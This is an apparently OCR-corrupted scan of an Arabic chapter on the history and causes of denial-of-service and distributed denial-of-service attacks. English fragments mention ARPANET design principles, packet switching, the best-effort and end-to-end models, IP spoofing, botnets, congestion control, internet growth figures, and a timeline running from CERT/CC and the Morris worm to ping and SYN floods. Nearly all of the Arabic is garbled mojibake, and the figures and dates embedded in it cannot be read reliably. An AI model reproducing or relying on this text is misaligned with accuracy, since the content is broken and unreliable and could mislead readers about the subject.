m Cj& jll lilli J 4jl-gIj> J IRC 15^-*^ U ^ T ^ J^^l ^-fl^>*J Clljl£ ,S jl jill 

Ai^UJI £>i& .IgJ Uuujj li^A 4_jj£ <jc !)Liaa <DDoS j DoS ^ *l'VVi>»l j J^ ^u^ujjII CjI ji^JI aJ IRC 'u^l Jc- 
.1980 J (HIV/AIDS) j^VI/ajj^I 4^UJI o*jj*ls jj^ ^Lftll J DDoS uUa j IRC 

Cj j^kJl ? jAjVI/^JjuiJI <cLixJl (J^AJ (JJJ JJ^ U^-^ t ♦ I^LJ '^C- all ^llj ^ (jSj ^aJ ciljl UJUa .(j^Jl (J^^ 3 (JC- djl j,^ a\\ 

_^L3l ^.L^jI ^j^-^ ^xii^xJI CjUjlaui ^ cIjVI^. t 6^31sl!I ^gk ^>j^1 

If'jj^ui jA La .Ajj^mU j^iLa lift .jJjVI/^j^u^I 4^11^1 (j^lj jjjjjjjS j^uail ^j- 4 J J * J ^ LT^ < »'« 1 "** DoS (1)1 Jj^ Jj^^ ^ 

ALilil ^1 MjJaj dJbjj t"jll o^ui AlLuua" l^JI jIju 4JV o^axJl AjUIuiI a^C- j ^^pVI JjIujjj ^llil IaIp Jj£ j- 4 AlLuLoib lJI jjpVI ^ 

IRC ^ j± ^ 'IRC J-^V1 Cj! jjL ^jLuj 4Knm U jUj&U cJ—VI ^ ^ii cjU^a DDoSj DoS ^ « 

4_LaUJ^)3l a£jjoJI ^ jL^ IRC ^ cJ^ J' ^ T A'sW ^a^pJl J IRC dlauLo ^al (J^asu . IRCc^ 1 ^*^' 1 ^ J ^Af^- 

<jU ^> liA ch ^ lS^ <iu*H J! J^ V cillilj " jU3! ^> aJU Ukio" (DeMilitarized Zone) DMZ 

AjjJaill .(Ajcli^ll CjIj^II ls 1c (Jjiillj Jjj^alll <L^al L^l ^-IauJIj tl^isu laSS distil IgJl t^l jl! J) ,4^aJt L-±a^ 4&j1a "J^" 

J CjI^JI j£\ ^jaxJI (j^jj '(worms) jt^lt 2003 ^ J -fj^' c> u^j^ ^DDoS lU^ 

U £±!& ^3!j ;^UJ! 

a ikluJJ jJl Jl! 4-kil3l jjiadllj t jLuUjVI Jc Sj^Sltj tdjlj^llj ^ laLudll J Igjaij ^a J^J! CjIj^I dijjia t4joij dlS jli I^A J 



(Design Principles of The Internet) ^u^j ^ jUa 

J AjUljJ ^ ^ill j ^Advanced Research Project Agency Network) ARPANET > ^jJI c^j j^V JjLJI JaL^ull 
djLauajj-<JI j CjIx-gL^JI J *^ j^. l^-jli ttilli ^j-<i V^j . l_u£^ j cJ^* cJ^ J ^ j^- J jjj^l ^3^'^ ijIS UiAic. I960 ^>^-^ J» 

<j| Jc ^ifljjJaxJl (j^l Jl jj jjj^ll ^xil Jl Jaii ^jl£ .'^IaIxJI djULud^Jl AijstxJl j ojfiJl ^ ji ^j-d aA^LujJ j tA-Uaall 

Ld^aj* jj£I CjULud^Jl oi^ dUaJj^l La£ .Asu (jC Lj£jjai ^llaJjlxi Asu ^\ ^jjijjJaxJl Aia« o ^jl tdjl^JjoJl A^.jJ Vj tLaLaJ (j-dl 

^jiaxJl ^ - ; ^ CjA^jII ^ lj£ c_ia ill CIASliA -laJj ^j) ^jjjUII (ilj^l tc_ la ill ^Jajaul J Ij^ I A J^-J ^-b aJ^J jj jJJ^ll o^-?-^ 

.^Jj Jail <J Ja Jc oAjA^JI (JSLuiaII (J^asu (illi O^J 'U^-^V^ ^ 4-^^ J^- 

Packet-Switched Networks 

J Jj)H o^Vj .{packet-switched network) dij^ * J^ ^ J^V^ J ^LaaVI % jSall 

.(circuit-switched network) ^h^j^^ *^ j^l cIjVj^ J^U. ^ 4 ^^\* -^J^ U jtal jl^j t^laJI J ajj^JI 

AixJl l^ja jl£ J£ J a£jj^13 A-naall ^nJl 4^151 <JaJ ^ j^^ll CjVI^ jll C1jjI£ .c flJxjua j c aKo ^ixu^ill I^A jl£ 

.(J^t» ill ^ > ^axJ ^ CjA^jII Ajjj Jill AiaJ! ^ jj <JL^j! dil jj3 4^151 t4_^pj| 

4-uIa ^^Lua 
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\ a i o^JJ <j I (j^J V jll CjVIj^J^J ^jl j-all AJa jQ^ a A laJ i u j _ c _ 5 _fliL<J\ Jl <JjujjaJ| ^Jjjlall ^ ^1 tdlVU^VI oifc (J^La. (j-a 

^atlxJlj (Jjoij>J| lil t jUlLj _(jL^ajVI ^l^ijl l& jJjaJ (j^J ^jl J-oll .4-g_a jll j^j^q ^Ijjl (j-a l& JJC- £xa dlLa jJjlaII 

..Jjl jxJl (j-a ^J-^ ;»lAalLudl Jl (_^^JJ L^-jt^ *^J^ Cljlxi^ J (j^lj Ajajla JJC. (J^joiJ t*< 

<Ja£> ^jj La£ 4_ilc^ Axuxj ^-aj^Lxi JL^jVI iaa> .4^3' 11 Jj £*>JJ jJl J ^VL^iVI < J JjSVl 4^*1^1 dul£ 

£_jJa jj-al V <jl£ t£-l2a jaJ Jaa. t*BjA jl£ lij .<K Cj^L^ajVI Jaa. <J j-aJ Jj Cj^I Jails jV I J*^ jt S^l j ftJflC- .4^jm jll L^Ja 

tia.Ha jlajojl istijaj dli circuit-switched networks ^l^f^l J 4-1^ ><JI ^*ll j .^M' i> Jliall j ><Jt o£ ^ 

<a&a JaSS ^jjjJ £>i& . jJ jj;^^ U£ <Jakj Jj <Jakj <jL^j*VI JaJ^)l A 1 ^ L a 4_illc ja. dlli Ja jlaa. ^jc 6jUc dijl£ jllj 

pIjj^VI 4JU J 4ijjj* CjVU^jI jl V Jtilbj ^^31 JJiillj JaLjjVI S^J 4jU11 4_Ja jc a<>u%\\ JSja J*^ o^j <^ 

Jajljjllj ^ixJl ^ 4-^-^j (Jl ^JG^ 3 ' J^ Sl£La-<JI ^H Uiajl <j£Jj 4 JjjuolijJlj Lfla I^A ^j^Uj V JJjSSH .^^jjai^ll ^.luiaJl 

^jja jll ^LojI c>^ circuit-switched networks ^h^j^^ s j^I a<^1 
^ixJI ^ ^jaxJI ^ a<^1\ d^a uj^" j .^-J^f^^ ^L&j^ajj ^ {packet-switched network) ^ 

jjajjj t (circuit-switched networks) ^^j^^ * jWI ^jVj^ 5JLa ^ aJc^ ^l^U jj^i ikjj j*j jiXL j£\ 

^jJjuj^J! .CliVI - ga^Vl L>^ ^•^*3^ (J^J ^Jju^I ^jl ^ ^ > nl SlI ^^)aj t^atlxJlj (Jjuj^JI 4_j^aj^aa^ CjI ^jfl ^ U -0 ■''SJJ^ 

^^lill j ^Igjjj ^aall CjLd jlst-d (jlasuj 6<g_a. jll ^jl ^jc j Lu1Lq]| (JxaJ ^3^" cJ^^ (J-o (J > -ajV^-j ^j^jflJ ^jJbijjauJl j 

^JJ 4_all<Jl ^j^)]a]| JjJaalj (j^-<ui Cj£ j ^JjujI ^ ^JLajjU ^ jll Clljl£ laJ > o jll ^IslSI ^jli diVU^Vl ^jAxJI ^j-<i Ja.l^J j ^3^^ JJ^^ 3 
(JLujjI ^jj Cilia. A laJ > o j ^ac <C jjoij c ajujj^J ^J^a*. (Jj^la q\A tJaUjjVl J' S^Sc- < ; 1 J > n i j3 jla jjc. ^^^^ jLaixJ! u sn\ til ,f>(pg > j 

^^aJjauI] .CjUUJI JAx-o djljjila dili lajljjll Jj^j te^liS JJ^I CliVl^ajVI ^jl ^ ^1 ikl^V .^J^Jl (J^J^^ I^A <fla.iUi (ajaJl 

a laluaJ ikjjuj jll ^ixJl jli tftj^l CjUiJl djli JJ><J1 ^jIsuIojVj tftj^Luollj jll iallijVI CjVAx-g ^ L paSlHH 

djj^Jal ^3 j /ojS jld ^ u *"H ^-g-a. jll ^1 (_^^jJ (^ill jll (^5^- U^>^ ^3^^ '^^Vl ^1 A-ia. jill S^lcj ^aJ (j-a j ^jj jaJill 

^^JaJjoa jll ^ixll ^ 1^. C«y^^ (1^3^^^ *^J^ *^ C3^^ ^^Vl ^1 (J'^f^ ^ U^J U^3^ ^tU^-^ 

\c jxjii I t Vn . iVi 3 aiajuqjI I ^^UxJI (j-i^a. .cjVI^jVI ^Slc ^ 6 jjij g-* (packet-switched network) 2;^^ 

ttilli ^x»j .Ajliil LgJ ^jjj jx»j Ajujjojj <j^ia.j jJl Ai^su c^ill t— ujajVI ^5^1 tdiVlj^jVI <il£j ^jialiaJlj 4jS jj jaIIj (J^^VI 
_^ jaJl lS^-^ A£jjoi aJ a - gaJ Jc 4 > ^a.li SjiaJ U jC^ .ClinaJl tiljLouJl JjS ^jxi aS jaJLu^VI ^ jjuoI <Jj^a. 4_LJajl (^la. Uiajl l^jli 

<c jIIaII ^j^-ll (Jjj^ 3 J Aic LJa-d jj da^juj oj^ill o^A .^SHa^Ij J-uij-^J) 4 a ^jlj-a V 

(bandwidth) c£-^jSll (jUaj (J^ajC ^ 4 a SIjS jjS jj ^ _<alla^ll CjVL^ajVI .JJAxll ^ 

c> s^lilaaVI J^U. c> cjVU^jVI c> ^jaxII ^jo^j {packet-switched links) -Mjj tCjVl^iVI 

t^j| jaII (jLojJa ^1 *la.jJ V ^-jl jA aJ/u all I li^ tft ^"'ll ( . uLallj /6^a.lj AjlS^ L^Ia J£ (>— >>laJ V ^1 laJLudVI ojji ^jl jfljaa 
L>^ J^-^^ ^ ■U J ^ C '^) J ^^ (j^^aJjab<Jl £y± ^jl jaII la.lj ^jl (j^J (_^^ll ^IjAxll DDoS ^ JJ^) -0 ( ; \ <> " -JaJjJalU jA I^Aj 

J ja. j J <C jjjouJI Jj^all ^^>^- ^.laJ djULuia ^aJ^!il lA Ljajj jll 6^1x11 Jc Jjl j^ll 3^-^ J ^^^^ ^J^ ^-^^ ^jojIsj J Cj jaJ! 
A K >*>1 ^ <JaJ V t^jjJC. jjuall ^jjyi^aJjauJl ^Jjj qj! jL<JI ^lAaljujVI ^jUijJal (J^lxll ajujISIH j ^jl jaII Jaia \ a'u) ,^jjjljJa jjfl^'iuifl 

jj^Ij i^J jjij ji jSaj v JUlbj ^Ula SjAii* (Resource reservation protocols) Jaia. CjVj^jjjjj .DDoS 

(jlajC t(JlL<Jl (JjJjuj J^) ^ laJLmd (J^l ^jl jaII ^j-d <l^lc <j^a. ^j-aJj^aaJ ^jl j^ll ^ > J flJ .DDoS JJ^>^ ^^)^ Cf^* 

^^aJjauJl AjjA ^LauU <l£jauJl Cj^cU^aJ tdljjjjVI (jliui J . ((J^a jail 4-abuox j tAjj^j^ll <aJlx-<Jl SAa j Cj3 jj t^^jlll ^jUalll 
(J^LjjII aJI ^ ^c. jll Jc Jjl jaII jl£lal j ^jjj Lo£ djbj^ll ^ ^j^xjl ^JJJ ^a.l^xJl (j^-dJ Clua _JP Spoofing c : 1 J tt1 J 
(J^txi Jl ^jjjc jjuall ^jj^^aJjaiAll Jl <jjudillj (JIslS jaj Jc 4 lilaJ id^aJl (Jjca Aa>l g a11 (j^J t(j£LuLoll d^A (Ja. ^aJ jl (^^^ .AJ^lxll 

,Ia^jI jxi a I lal> alj <Jfll£ll CjVI (jljlkl (j-d J J^- 

(packet-switched network) ? J^j^ c \^ > ^ -(! 5SJ1aJIj Jujj^J) JjjIs ^1 ^ ji^Jl I ^ SS «j aj^JI 

6 j3 ^a. ^ .J^^^^ ^^A 3 ^ c ftJui&J (_^ill C5 £j-<iljj^ll 4-ia jilll diLixi jjl ja. JJjlaJ 

.IgJLujjl ^aJ J jxiJl AjjLuj dijlS ^1 tilt t5 SSlJl Jj Utiawc lajjla ia.b (jl^ ^1 5ia.jll J ^a jaJl j CjVI^jVI 

Loj t^jjja.VI (JjSjLuiaII AilLai j t^jlall Jjuaa XiC SjjujUx jjIjj <iaJjoj j ^ac (Jj^la ^jc jUlaVI AjIqC j ^jjjjlal! jjj*j AjflU ^aJJ 
V <j| L_Ua A-njlaJl jIjV) U^J J^^ cJ^^J Jl jaJl <±a jj <c jjuj lWjujJ I^A . Jlloll j Jjojj>JI tilli J 

, JU3I <j£juoll J <£jjuall c_jal jj U jC^ ttilli >i jlil jllj 4^ jaJl <Jj^I ^jjj <J>»l^ll jLoiaII L_ fljsu 4£jjuoll J 6^a.lj ^jJ 
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liLol (JtlaJl I^A ^jJa jJ ,B S^-*juoj L - * D cl)!^ .(-1^ jL^-a ^W*^ J J^-^ <La3^ J J' 

l^jjj^-^ .DDoS >**\ 4j j^j - ^ £^0aA\ £y* j <^ IP spoofing c * q> ^ s-**^ 

.DDoS ^ v^n^l ^ja»JI ^la^ll £C£i Ax-b cjU^j j J£al> ^LKuLftll ^SliS ^ jj <DDoS uL^> 



-© 




^ Ssxl\ m (j\l±xA\ ^jAxJI £a Cj jJ^Wll <JjoiJ taAW a Lis* j] jJ^Ia jjJaJJ ^1 CljjljVl ^\ AaJLoal -LaLojl d UJjujJ ,1a JJC- (j-a 
^.Ij (jj^J La S^lc j (dl jJ^JjlH lI^-J^ C5^) Ail^ (jl 6 (J^-^ 4-lajljla (dj jJ^Wti ^ > Ajjuij) CljjljVl (COFC) 

* jjj-oll ^^>^ ^jLujjuiV c3^-^ o^j^ core ^ -Wjj .core ^L ^Jaiij^ jLui>JI 

JSI ^Uajj Jj^a A£^>^ Ja^a ^-LL^J L_fll j^Jl L_J jSI Jaj|j^)3l ;d^j^C a j A alia o j^U^o 

(jLkj Cjli (Jj^j (core) ^^LojVI -1^^^ £y* jj^y^^ '^j^- Cy j& fp^ A-njL^Ji jLiVl .^^jlll ^jUail] (j^ajc 

■ DDoS ^Lj! Cj^j La kbJaL) 

Best-Effort Service Model and End-To-End Paradigm 

^^UJI ^1 ^{Best-Effort Service Model) JjJaa! ^i^oj jA 11a .^La^kil cjULu-b ^1 ^U^jj &l jLaiJI ^j^JI 
I^qaaj ^ ^ala <, jjj-<Ji ^^>^ S^lcj ^^^ic Ja£a j^jiill ^1 4^1^ (routers) ( - ^ ? L " s ^ y ^j^V^ ~j 4_louj^)3I 

s 4 a\\ o^J ^jLiJ3 (J^»> ^>"s"m j laJjuoJ 

jjjj ^31 ^iLaull Jla t j^JaSli d^^xi dj lAkLa i^IUa ji (End-To-End Paradigm) ^U-^^ j K^ M1 J 

t^rj^ >^Ml j LkaJ! ^jc c \ iA^j^A\ c_ilSa s^lcj t(<-aj^ SjLuA ^1 j^-Saii (jl <jL jUjJa ^1) {reliable delivery) 

(Jilll CjV j£ JJj^>J c^^ 3 U^J A£jjuj JjS ^j-a oAxUx-a (JJ^J (jl V t^UjLuJl CjLa^kjlj t jjLuallj t^a^kll CjI Alala J^-J 

c_jc!>Ij3I jJ-lj (IP) ^—^J^V^ J J^J^ .^^J ^-W^ -^^^ A£jjuj cJl JJ V LaliJ ;4_jjjjjJa3l CjLa^Jl jjaiil 4 ; ^aA AjI^-^I ^ ^ixu^all 

<iLjaVL (jj/d ^ ill (j;iiijJaxJI .dijjljVI a£jjoi Ajl^-j ^iijjJaxJI j (router) ^3^' ci^ j tAj.u>L.nVl 

^gjjjaJI CllS jll <Jj£ . L>j > tt < jj^oll (UDP) " ^JLjiaII dLUj LU4. ^ J j£ jJj^)J .^La^Jl ^aa] i oj jJ j>J (TCP) 

s^V 1 JJJ- ^ ^ (RTSP) cs^l ^ jll ^ JjSjjj^ 4 (RTCP) ^ijLJI ^1 ^ fSaJll ^ '(RTP) 

(Jij JlLa C5^^^ L$ J±^<^\ ClA'l djLa^kJl ^-AjUj ^aJJ /ojlnjuill JjLoj^)3 (IC1VIP) ^--^J^V^ L^Lojj ^ A^aall <J j£ jJ j^>Jj 

.jj^jiii .^cj t^jjj^iyi ^^>^^ 6 "Ljjj^ (JjLuj^)3i tdijjijyi ^ cdjiiLJi 

djlcli^ ^ jSj ^jli * - jlti^l ^jjj .^^^jJl -!aJ^)3l aSliA o^J^. L_fljUaj AiUiaV (JjjJ ^^-^^ ^J^-^^ *^LP qj La 

fjA \Ai\£\ ^llall q\ ^3 t Jx-aVl ^ pL^ La£ tAjlgil! Ajlgill u!^ t^J UJ^ -^J^^ DDoS 

^j-a V (jlS A£jjoJI til jLoj A-iLfllaixJl dj| jjisull £y La£ t^Lila j ^1 ^-a 6^a c fll > >i1 ^jl ^irTn V A^JjaJl 
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-lajoij J J jsu JJJ^I ~ o jl ^ ^ AjjIL-g lLu\£ ^^jII S,lia. jll CjLd^Jl jl <suji3l £>i& j& ja. jl£ .CjLlg-ill Jc iaSS lA^iiij 

AiLa. Jc (JjJaSl <J^-^ JJJ - *^ ^^P" L>^ ^ A J^V S^-la^a jll CjUj^JI dlxjJaj .4£jjuJ| 

j>* ci±jl£ (cjLo^JI j>* < fljj^jl] (J j]| ( aM U> j] <jL^jjojV1j a£aJill <J>ujjj Jllj) 4_ii<»VI ^-g-<<JI jl Jj 'M-g-^ **-*jji uj^ 

L-jLau^ai jl (jlajjflj 4juji3l m Aj ^L}£Jl ^irTn a£jjuJI J Lnjuj -I^jJ V j ( jj/^ (S ^ UJ^J* 4-9UJI J ^ J?> J*ll ^ JJ jaUi 

;4jlg_i3l J UJ^ ja. j*3l jjiibjJaxJl 
.Ajlgill J J ja. j^a t iUjJa^ J£ j^l jLajJal tdll j^VI J tdlljlg^Jl j idlS jll tilli J LoJ Ojl jj£LoJ 
.<C jjoiJ AjL^JjojVI CjIs-I jal iLajlj i nflJl Jc jLja JaLudil J^juij a UOi ^ Jc jjj^Ui 
. jjja.VI jjiibjJaxJl Jl 4£jjuo3I jSl jlll !.lpgJ ! it aJ jl ^iljlkl *J jll i nflJl jjiiLijJa-all jl Liajl (jlajJflJ Igij 
^^juaflj t . UjudJ 2004 J 2003 J ^JJ^^ a ^ uJ a J 4< j|j£Luil «">lj J^ Jc- a - ^ JJC- Igil CAjJaljliaVI oifc dujJ) Jflj 

jjjUc l^j jj AijjL (router) CjL^jJI Jkxj J u^s 4 Jc tmstream DDoS g^jt .botnetj 

.Slammer sjjJI J*i US 4 j^J! 

cjIa^a ci^jj^al jl lid '(Network Core) »*N ^ DDoS <; \:r ^ u- 0 'j^^ <^ ^ 

^j^aj Ls l^ <iUJI AjiJI cjUI > ^jqti CjIa^a ^ J^UjII oSaj V j t^^HaVI ^pJI ^ sjULujVI ^Saj DDoS 
CjU^JI ^Ja ^Ic^ Cjlc^la^ AiLjaU ^ jSj ^jSI DDoS ^li^ll djLJT .<iUJl JL^jV ^^^j^I Jlkjll c>aj^ c> jjSI ^j'q^l 

L>^ M ^-^^ cl)^ U^J ■'S^ c ' f ^ UAic Aj^IslSI Jj^>^i ^S^)^ djL^aLa ^i^Vl l^A ^ 1 Jj 4_Ldl (JjSj ^jIj 1 

jUiajVI liA Jldl £&Ja £)\ £cjJal jllj CljUlSal<Jl tilt 4_iiti3 ^ jAill L-lllaJJ <^jjLJ! DDoS 

^AilJaxJl <ajjaJ) L— b >n\ j t^iixi aJ ^ > ^il I^iaS l^jia aJ Ajlgi AjIuqVI Ajujill L5 J^jJal j ^jl jSilj A£jJo3I ja. J DDoS ^^-C-^^ 

Aiis^ CjU ^ djblUjVI ^ a^U ^ .^jU^' ^W^^ "Ujj^ ^ v; " <>; DDoS ^li^ll J jla. J j*. CjblSSjVI 

'(end-to-end paradigm) Jj (best-effort service model) J^a> <^ ^^j^ SjjSUI jlSaVI jj^a 

aJjuoflJ j <iaLau3l oi^ J> ,AiLaJl ^ac Jj ^iisu JS c ; laJ m A La-LoiJ AjjojLojVI a£jjoJI oiA JfJ (Jl L-JLaJ ;Ajoiij aJAj^alU l^ixi Lt.nLt.nl J^aJ 
J AicLjaxi b^\j jj 66^J^aJl CjV jS jJ jjJl J Cjl^ulalll (jLa^jj taa^Jl djU^aJ j^ t nj dljjljVI <>— 1« 6L_fll jaJl j jA jaJl ( fljl la jll 

I^A j-a ^jLudll ( . ul a II j jjoJIj ^^^jlill (jUaill ^jiajC. ( J jl jx^JjujU ^jI jj £a Aj^aikjj ^Jj3 4_Sjjajj <Jf5 cJ JJ^*^^ ^S^)^ 

A£jjoi -laJj ALd . ja.VI L_fljia3l L_alj Jc JasUj L— ma Ajl^ill Jj "LA^l j^j J L_fll jJa^l -la.1 jj^J LdAjc L^jJal j ^J>«"iJ jnjtnj aJAj^alll 

.tJLa-xJl JJJaJI -ia JJ^ 1 J (Ja.^jll <UjV <■ la j ^£J^ C-Lujj] 4 laJ t n jll ^ixJl tJaJjoJl 

3J1AJI ri^j t ^ l .(congestion incidents) ^^jVI c-^lj^.j ^ip Spoofing 'DDoS J U k^alb ja 11a 
J cj j^j^^ l .(congestion collapses) ^1*0 jV I jW^^^ c> ^> c^jj^VI 1986 j^j^^ J *j* JjV <a^alj 

(J^La. j-a <C jjudJ <J£jouJI I jl jUj ^3 j -laJjll AjdcSl jl ja>»J Uui JJJ^l ^J^- j-* ^3^^ <JUjLj jj-ajL 4 lal t tUJ I jjl£ ^-j^JI 

4^ jaJl jc Ul^II end-host TCP implementations ^Uj ^ cjUIVI .TCP ^ jl J aiajll cjUII ^ jJij j ^xl^ 
Sjbj jl LajJalj ^il L<i jlcjjoj 4<il3i ^j .cJUjVI <J , ^*- xi j u °^ tJ^^ 3 c-^ ^ W a J aJLujVlj aLa^jVI Jc cJ^^ <iaaLaJI 

Ijjjoiij jl jjill j^.laJLaixJl ^VjA ;^ja.l ftjUau .4_ij|j^c Cjlia^j J ja.j J ^jl ja!3 j^lc jj^ jLajJa I g j£ V "LA^-^I Jj A_a\_^_iSl (jS^j 

t>^ c> ^j^? c5^^ lP 3 ^ J^ o3j^ (congestion control) jVI J ^£aj3! 

djlia^ill j3 jld jlll (jLkill (J^ajC jxi ^j-all ^Aj^aJfl 6 JLojjVI jAx-d Lff^'j^ dlliflJdll aLa^jl j jlHaVI ^^JJ La£ .L-fljj^alll 

/ flj^aall Jc JjJ ^^jll 4_ij|jAxJl 

^aJj^aJj <jSI ja3 <iajuj jl<Jl 4_ia jlill o j^-a.1 j-« o^LoixJl t . lilaJj A_a\_^_iSl Jj AjL^jII ^ j jaj (ill^ijl j!)La. j-d I J^l aKjuLoJI d^A diaic> ^3 

^jialjc-V ^ jJI (router) J SjjuHLoJI -UjuujjII CjUWI j>» jlc jj tilLiA .<U!asl1! jUu-aJ djlia^ill jjj ^^^jill jjUail! (j^ajc 

c^] uj^ ^ .fair scheduling algorithms j active queue management '(congestion) ^U^jVI 4^ 

Jllj .UUi DDoS <aJUJ JjUo 

(Internet Evolution) ^>jVI jjIsj 

(2004 ^-C- J) cJ^^ J-^ij dljjljVI j-« jjiilxiaxJl J^C jl l— Lft .l^jLodj ALq 4 JJt t'Ml j aa^aJl J cJ^W^^ J - ^^ ^—^J^V^ A£jjoi uj 

dljjljVI a£jjoi dlaaj^al 64jujjoj j A t *aJa*j 3JLujj l^o-lL >n jt ^aij .dljjljVI Jc jj jJJ^ jW^ 1 170 L>^ jffi ^LiA jl£ 
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B £u j^V) <j-al ^ jjjj J]| LLuali) (jja JjJaJl ^j^j Jl tuajj JjI^JI j-aUt I^A <^Ij 
lijj <4£^l J ^ c u^uJ! c>-64 6 C5J u fl Sl ^ tilU* jl£ < ARPANET t> J jVl f bVl J :(^') Scale - 
23 '1971 ^ J .^^1 oj^Ulaj j^VI ^ jIj jl (>» ajV jl£ *2<^i J] < a] t Sai^ j*->* ^ jl j^Vl jJ 

a*j 4981 ^ J .((router) s j^J\ j^UJI c_i3j3l J ^s^) u jqj > ^ l i> J-^l 15j u A » ^ l t> 

^jSI j TCP WtU^ Ig-^l"^ ^ J^ J 'd^J^^ 64 J JaSa ^ 6 u' j^' J j**- <NCP) ^ j^l 
i^IUa jl£ 4983 ^ J ji^? .CajjjjVI Jc jjijjJaJI t> 213 JaSa '(1975 ^ J j 1974 ^ J <oa^ 

c> j^l (ARPANET iP^ ^ L^d) 1989 ^ J jl^j * 10*000 c> 1987 ^ Jj^ 4*000 c> 
% jb] UUi c> A j^V 1 c> uj^ 170 c> jSl ^ ol£ <2003 J .0*^1 100*000 
.CjV jlii ^j^I aI^joj (jj^ii (jl Jj ^ <^VI .^_Lq (jj^ 170 ^jl^j (Jj^LolaH o^j *^ (j -0 L - ) ^ 

jll ^j-d L_flVl j) CjUaII ,\nVj a! uij j£ (JJ^T^I ^1 (Jl (^5-^ I^A ,A-iL<iVl ^ j^ll <J!L<i ^^Jc a^J V ^jjqj> >>^ll 

(jj^^j QiA^'\yi\A fjt> ^ jA\ dijjjjVl ^^qa^Luox ^ cilliA noil uLjsu ( flU) User profile 

A-ijUiill djliL<Jl cJj^^^J U^J^ Sjlc ^^1^ ttilli ^^^ic 6 j^lc j .^J^ > *a lS^^ <j^aLaJl 6^^. VI (jj-aul *Ldj!>l!l Ai^sLxJl 

jl CijjljVI aJLojjIj <illi '(S^i j^A 3 1 ^iilaj JiLd jiil 4_jj>»ii3l a1 <jj±aJI ^1 j^VI 

L_ij| ja. (j£J j cAjjaali djLauajj-<JI j cjlx^LaJl ^^ic Ijj^ali Asu ^3 djjSjV! ml jJI \{4 \\f Popularity 

jJl ^ lajuljV) ^jxi AjAslSI ^glc JJjJj J^^^ C5^^^ JJ^^^ dujjjVI C-iL<LaA 

(Internet Management) Sjbt 

4_il<il 4_ill ^^xJlxJl jLaajVl (jia^)i3 ^Jjjuj j Aa. jj V 4(_^^)a.l A-iaU £yz a (j\j ^Lgjoj (j^J t*1J^ '^J^- J d^J^V^ 6 C5J^V^ 

^31 cJ*^ CjIaja^jI! daa ^jjj 4 at-ula <jl£ .(Ja. Jj ^llaj ^a.j>JI ^^>^.l 4 K uj a XP spoofing <J j> 

_4jUl13 4_jlia. jjc. <J jlaJl jjj (J^-nj ^^JIslSI jLaajVI lP 3 ^ <J1 aajujl (jli ttilli ^ j .4.^1 j-d 6^1x11 ^j-d Aj^LaVI 

A3 j A^JjaJl JJ^Jl ji^J (jC CjUi jlx-d ^jAflJ J ^jjJC. JJ V 6^lc 4£jjaJ! <>iAa. j^JA (jli 4<JLgcV1 jla-^ j <Jj^ j>n^ 

^jil JJ ^H^J L_jila J£ .CjlaJjuJl (JA AjAxJl JJC CjLfta^Jl ( ■ (JAljA ^1 AajJ V ttilli Jc 6 J^C .CjLAa^Jl ( ■ l^LJ J (jjlxjl! 

tCjlcLoJ XjJaJ (JA JJ^al DDoS AjAxJI (jl L— Ua _ jJJ^jl jJ^kUll 11a ^aAflJ .A£jjai J£ J (jLudjVI (J^ (j-* Aiilill jjia. Ja.Ajj 

.AjjaJI j ^ixulxlll cjLui-ujj-aI! Ljj Jj lJj^j t ARPANET 6^ f AjjL ji\ SjjI j 4986 ^ J cw^ib ^NSFnet 



4-uIa ^^Lua 
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DoS and DDoS Evolution 

CjI£jjuo3Ij 4^jjoJI CjVI ^L^jSI ^JjIjL^j <iljl^> JliiaVlj (jj.uiali.ft3l cdjjljVl L sl&j* * ^ j^j UU^.i ; jj* 

LaLaJ Ifrla A3 <j£LuuJl ^j-^ ^J' .(J J <-ajla3lj < djjJjVI dlLaAaJl ^Jl^J a j£j DDoS ^ ^ tAjC>1 L gall jljjuiVl <3jjujj 

jixk (j-d lS^^ uU*^^ CjAcLuj S&j .4jLaa.ll j] J^ll J jl^t t Likjl) aa O^J 6 U*^ C5"^ 

^i^j^jj ^cxil^Jl CjIjj^j jIj>jI U^^^ (Jjxjauli A aiaJlj Cjlkulalll .Ia jLuujl t—flSjj (_£jA*Jl <LaJ^& ^JUlLj ^ ^ all jl^-aJI ^^ic 

4-JjUll jlj^aJI .IgiaJ ojjjSII <jjUj3Ij J j^Jl c> ^ jll < ^ <^Jls^ jjAJI DDoS <&^> 

History of Network-Based Denial of Service 

(jC ^IjJaa t<JjViui^\l <Lu^a3I CIjIaL^jVI (jC 6JJ>^J ^ laau ^jl l^J <laJJ^<Jl CjLa^JI j DDoS J DoS LS J^Jl JJ^ 3 ^^ 

http://staff.washington.edu/dittrich/misc/ddos 

1980 >»ji J- 

^Ui^^U ^ja DARPA c> Vl ^ ^1 ^CERT/CC) CERT Coordination Center ? 

^ djjl jaJl ^Ui^VI j g-. J-U31I s jjiJI <>A CERT/CC .W^ j^VI ^ ^311 '(Morris worm) 

1989 J- 

.ping.c J ^ja^I jjSII ^ _f (flood) JjVl jj^ill 
1990 <> jSj- cjsj ^ J_ 

(j-d tAjtild jl oAjlill |(jVI uJl ^jjjlill c all£jjx Cj^jjj j£i j j-<Jl Aj j-<Jl j Aj^<JI AiLjal ^A-ijL^Jl CjLdAkJl j djLi jlx-<Jl 
jll ^A^JjouJ! <j^aLkj (4 Ilia] (jj^J (jl dAjA^JI qAa 1±J1xjuq1\ j& <Jjaij ^jli tlLLuj LjIj Lo£ (j^J .(jA^AaJLud^ll ^Ac (_^jLaaJ <£jjuoll 

(jli oAA ^1 laJLuji £yz .(J^LuLftSi ^j-d AjAslSI CIijjjujj ^]^J (JC- *L<»AiJl t . La a ^ di^Ja 4 1990 L ^ajla 

L-iLud^Jl AijjaJ lilli ^5^1 J , JJjLill (j-G jA3 > Al (jj^J ^i^. tAjUjjoJ a£jjoi 6 jj jjj^ jl^J> L-jL ^LL^j ^.I^aII 

tlg^lc-l j IaAjA^j cJ^-^^ (j- 0 (j^ DoS <-!^*-*^ ^ JJJ 0 ^^ djLLud^Jl (jj-^l^xJl ^AaOjujJ (j! (j-d Cjlx^LaJ) Ajjuoilal! 

J^l (> ^SjIaj ^ cjLLo^J! .sniffers '"^y^ tjj^^ ls'^ ^"^Ull 
telnet L£ t^Ln^ jj^i dia^a) j thin-wirej flat thick-wire ^j^^ a<^^\ &L*\ jll tSlli ^ ,t*Ui 

.sniffers ^^. u ^ l!^*-^ uj^t^ <s ^ a ^ ^ ^-^j^ CjI^jjoJI tAiaxjJall a£jjoJ! 
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1996 i- 

Jaia SYN ^ ^ t> cJ^j^ < "^^ . n ^1 j TCP/IP stack ^ * ^ 4 1996 ^ J 

